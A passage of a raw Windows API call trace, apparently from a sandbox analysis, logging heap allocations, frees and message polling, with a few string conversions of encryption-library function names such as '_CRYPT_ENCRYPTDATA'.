lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0083.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0083.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd8) returned 0x18523c0 [0083.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd8) returned 0x43e87e8 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18523c0 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0083.908] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd8) returned 0x18523c0 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18523c0 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0083.908] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0083.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0083.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0083.909] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0083.909] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd8) returned 0x18523c0 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0083.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0083.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd8) returned 0x43e8010 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0083.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0083.910] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0083.910] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.911] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0083.911] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0083.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0083.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0083.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0083.912] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0083.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0083.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0083.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0083.912] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0083.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.913] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0083.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0083.914] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0083.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0083.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0083.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0083.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0083.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0083.916] RtlAllocateHeap 